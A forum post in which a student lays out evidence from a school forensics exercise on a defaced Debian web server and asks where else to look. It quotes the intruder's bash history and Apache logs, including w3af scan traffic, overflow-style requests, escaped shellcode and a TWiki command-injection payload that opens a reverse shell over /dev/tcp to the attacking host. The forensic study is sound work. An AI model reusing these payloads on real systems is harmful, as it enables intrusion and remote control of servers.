Debian server has been hacked; where to look for evidence?

Discussion in 'all things UNIX' started by Eagle Creek, May 24, 2011.

  1. Eagle Creek (Global Moderator)
    Hey guys!

    Let me start by saying it’s a school assignment, and therefore not a real world situation. Nevertheless, I would appreciate any help I can get.

    The company ProvidIT has contacted us: their website has been hacked. Instead of their normal website, it shows “Buy credit card details online, click here” (cc4u.jpg). A classic defacement.

    The following offences may also have been committed, so it’s our job to find evidence for them.

    (I had to translate the Dutch law articles, so they might not be 100% accurate legally speaking, but you get the idea.)

    - Unlawfully accessing automated systems
    - Copy or tap (eavesdrop) data after hacking
    - Unlawfully access or use system resources of a 3rd party computer
    - Deliberate access or impede the use of automated work by sending data (spam)
    - Tapping or recording ‘data’
    - Placing of recording equipment
    - Being in possession of equipment capable of tapping
    - Publishing eavesdropped data
    - Create a malfunction in automated systems on purpose
    - On purpose altering data or making data unusable after hacking
    - Being responsible for altering data or making data unusable

    We already found a lot of evidence. The problem with the evidence right now: it’s all circumstantial. We cannot yet connect it to a conclusion of fact. The evidence is supposed to be used in a lawsuit, in which a hacker should get convicted for the facts mentioned above. Therefore, the evidence needs to be there and also preferably irrefutable.

    I’m going to provide you with a summary of the things we have found, and what it could mean.
    Since I’ve kinda exhausted my knowledge here, I need some help. What I’d like from you is to tell me where to look for more evidence. Are there more log files I don’t know about? Are there more system locations we need to investigate?
    We’re using the CAINE Live CD and Autopsy to investigate the hacked server.

    Thanks very much in advance.

    -----------
    NOTABLE CHANGES / FILES
    We found both a passwd and a passwd-, and a shadow and shadow-.
    The passwd and shadow (without hyphen) have a user added (cees) when compared to the files with hyphens.

    /var/www -> index.html deleted 15-04-2010 (changed 9.57.51)

    /var/www/user/index.html -> defaced with cc4u
    Cc4u.jpg
    Cc4u.com site (URL)

    /var/www/user/leo/.bash_history
    CONTENTS OF THIS BASH_HISTORY:
    Code:
     ls
    ls -la
    cd ..
    cd /etcd /etc
    cd /etc
    ls
    nano passwd
    cp leo@ServerGroep1/etc/passwd /passwd.back
    cp leo@ServerGroep1:/etc/passwd /passwd.back
    scp leo@ServerGroep1:/etc/passwd /passwd.back
    nano passwd
    nano shadow
    logout 
    ls
    cp cc4u.jpg /var/www/user/cc4u.jpg
    cp index.html /var/www/user/index.html
    cd ..
    ls
    cp index.html /arno/index.html
    cd arno
    ls -la
    touch test
    ls -la
    rm test
    cd ..
    cp index.html /arno/index.html
    cp index.html arno/index.html
    cp cc4u.jpg arno/cc4u.jpg
    ls -l
    cp cc4u.jpg cees/cc4u.jpg
    cp cc4u.jpg ed/cc4u.jpg
    cp cc4u.jpg ellen/cc4u.jpg
    cp cc4u.jpg peter/cc4u.jpg
    cp cc4u.jpg tim/cc4u.jpg
    cp cc4u.jpg tom/cc4u.jpg
    cp cc4u.jpg ton/cc4u.jpg
    cp cc4u.jpg vincent/cc4u.jpg
    cp index.html arno/index.html
    cp index.html cees/index.html
    cp index.html ed/index.html
    cp index.html ellen/index.html
    cp index.html peter/index.html
    cp index.html tim/index.html
    cp index.html ton/index.html
    cp index.html vincent/index.html
    cd ..
    logout
    Question remaining: which user did this? He’s already in the system at this point.

    LOGFILES
    /var/log/apache2/access.log
    Several attempts to find errors on the website, execute path traversal, etc.

    Code:
    10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
    W3af => web app attack and audit framework to find and exploit web apps vulnerabilities
    
    http 400 = bad request
    http 200 = successful
    
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "QWERTY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "TRACE / HTTP/1.0" 200 54 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "GET / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "HEAD / HTTP/1.0" 200 - "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "DELETE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "PUT / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "POST / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "COPY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MOVE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MKCOL / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPFIND / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPPATCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "LOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "UNLOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "SEARCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /asdfg.hjkl HTTP/1.0" 404 320 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/999.99" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/999.99" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / hhtp/999.99" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / http/999.99" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.9" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/9.Q" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.Q" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.X" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.10" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.1.0" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.2" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/2.1" 400 338 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1,0" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.0X" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/" 200 5518 "-" "w3af.sourceforge.net"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0" 200 5518 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/ HTTP/1.0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /HTTP/1.0" 404 318 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP /1.0" 501 325 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1 .0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1. 0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0 " 200 5518 "-" "-"
    
    
    10.13.37.10 - - [12/Apr/2010:11:38:58 +0200] "SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 414 362 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:38:59 +0200] "GET /OvCgi/Main/Snmp.exe HTTP/1.1" 404 329 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /g?\x921\xd0\xd2\xd5/5\x1c#\xd6\x98$\xb2<\x7f\x11\xd3\xe0)\xe1K%=}-3\xf5\xb5\x99\x91\x11\xe1{F\xb1\x87\xf7\xe2\x7ft|\x1d\x1c\x83\xd1\xeb\x1a\xd5?y,\x8c\xe0w%\x13\xfcz/sx(\xd6\x96pH\x88\xd4\x15\xb4\x8d\xb6\xb9JF4uGO\xb3<\x98\xb8=\x92\x19\xe3Nv7\x14*\xf9\xbe\x81\xfdf\xba9\xf5\xb7qB5\x9fg\x04'CI~$\xb0\xbf\x972\xd0\xf8\x05\x99\x90}@rA\x9b\xbb\x93\xb2\xb5K\xa9\x91-\xa8\x89\xe1~5{,\xba\xb7f$'J\"\xe0%\x9b\xb4vN\x1c\xb0rF@\x9f\xa9\x03\xfd\x15Ksuy/\x99i\xf8\x91\x93+\xf9}#\xf5\xb1q|-\x04\x86\xd4\x12\xf6\xe2\x7fI\x90xB<\x96\x97\xb5tz\x05\xb9\x01\xe3gwp?\x80\xebG\x1d\xbb8\xd5A7C\x92\xbek\xfc\xb64\xb8\x85\xff\xc1\xd2\xd6\xbf\xb3=HO\x14\x98\x8d\xb2\xa8~u5g\x04\x02\xe21\xfe\xc6\xc7\xc0\xf8\x7fq\x1cH\xb1s'\xa90\xd4\x84\xf94\x1b\xfdf\b\xe1x@G\x91!\xd6r\x10\xf5/\xa8\x92B\xb6\x05\xb5yJ|C%\x97?\x90z:\xfc\x937O;\xe3-\x18\xd5\x9f\x8d\xba\xb7I\x98<\x15\xb0\xbf{$\x96pA\xb8\xb4\x87\xd1\xebwK\xbe)\xe0F\xb2\xb9\x99t}\x14\xbbv=,|{q\x1d\x89\xeb9\xc1\xe1N\x9b\xb3\x9b\xb7\xb3\x1a\xf5\b\xe2A\x02\xe0s\x15NB\xb9g\xbe\x91\x9f\xbb\xb8\x1dy'\x11\xe3x\x7f/3\xfd?\x98\xb2\x93\x8d\x97vOH\xb5r5f\x1b\xd5\x92\xb6\x04F\x18\xf8G\x85\xd3\xd6\xb4\xbf\xb0C,K\x90\x8c\xc0\xfc\xb14wp\x05\x96$J;\xf9\xba<\x14}Iu%\x1c7tz=\xa9+\xd4@-\x99\xa8~f\x81\xe3*\xe0\x14{t7xwrz#\xfcB~=|\x15\x03\xf7\xe1qk\xd5\xa9\xbb\xb9JpA\x99\x12\xd4\xb3\x96sF?\xb5\x9b\xa8vG\x04\xb0g\xbe}<\x938\xd0\xf9C\x10\xeby!\xe2'\xbf\xb7\x8d\xb1H\x7f2\xf8%,\x9fKOu54\xb2\x88\xe3\x01\xe1$\xba\x92y:\xe2i\xf5r\"\xeb-w\x1c\xb8\xb4~1\xe0Nt(\xfds/\x98u\x05\x90v\x1d}0\xd6{I|@\xb6\x91\x97\x83\xf6\xd2\xfc\x97\x7f-\xb4f/z\x1d\x8d\x93\xb7\xbf\x19\xf9\x96\x98\xb9\xb5K\x15\x9b<p%\x1cNg\x13\xd65AF\x14G\x84\xfdC?\x99\xbe\x80\xf8,Oq\x04\xbb\xba\xb6=\x9f\x90\xb14\x92\xb2x\x05@$H\xd47\xb8\xf5\x86\xd5\x91I\xa9\xa8\xb0'\xb3JB3\xc9\xb1K\xdb\xcd\xd9t$\xf4\xbf\xd8n\xcf\xbb[\x83\xeb\xfc1{\x0f\x03\xa3a-N\xd2\xba\xe5C+\xbd\xfaLZB\x03\x8d<\xca\xe6\xbcn\xa8c\xec\xbe\xba&\x1d5\xee\xd2\x96;'\xd4\x1f\xf1\x11\xdb\xa04\x9e\xb7cWb\xca\xb7\x
b7[\x05\xca\xb6\x9cx%\xeau\xf6\x94\x1a\xf1J%\x1b\xd5\xc0\x15cP\x16\xe1\xd9[GZV\x13\x7f\xd00\x84~5#\xf8\xc92\x97\x8a\xcb\x92\xe6s\xfa\xda\xa4M2\xd7\xb5\x8a\xf5\b\xc0\xe0\x05\xb4\xd22wbW\xa7\xdf\xe1\xcf\x03\xe1&\x89\xc0\xed\x83\xde\x8f\xf1\x123\xa4\x0e\x9e\xb2k\x87\xe4\x90\xaf\xc3\xbf\xb9\xf6\xa9n\xc6\xe9\x16\xceba\xb4\x1b\x14(\xd1\xe8*\xd3!g=\xa0\x13(\x95.\x18\xa13\xa8_\x98\x83&\x9e#\xf3oew\xa3\x07L\xf8(\xd8q-\xfe\x88\xdd\x9e\xbex\x9eNV\x93\x11\xb0F\x9c\xfb\xd9\xecfl\xec\xfdMf\x98\xff\x8d\xe3Nvka\x7f\xde#\x1e\xe6{\xbf\xbf\xe7V\xc5\x80lT9N\x85\x11)'el\x13\xeez[>\x0f\xefg\xe9X\x87e\xcc\xaf\b\x96;\xa4\x81\x02\x84\xd3\xed\xc2\x04$\xb8\x88\x04L\x1c\xe8Vic%\xcb\"\xf6\xc5\xba\x97Q\xad@\xc1\x96r\xba$'Om\x01\xad\xb9\x1bam\xaf\xa3\xbbw\xa9\xfd\x9fB\xb7\xb6\xa8G\xe9\x1c\xfc\xff\xff HTTP/1.1" 404 311 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /twiki/bin/view/Main/WebSearch?search=gWSkE5%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x30\\x3c\\x26\\x32\\x31\\x33\\x2d\\x3b\\x65\\x78\\x65\\x63\\x20\\x32\\x31\\x33\\x3c\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x74\\x63\\x70\\x2f\\x31\\x30\\x2e\\x31\\x33\\x2e\\x33\\x37\\x2e\\x31\\x30\\x2f\\x33\\x32\\x33\\x33\\x33\\x3b\\x73\\x68\\x20\\x3c\\x26\\x32\\x31\\x33\\x20\\x3e\\x26\\x32\\x31\\x33\\x20\\x32\\x3e\\x26\\x32\\x31\\x33%27%7csh%3b%23%27 HTTP/1.1" 404 339 "-" "-"
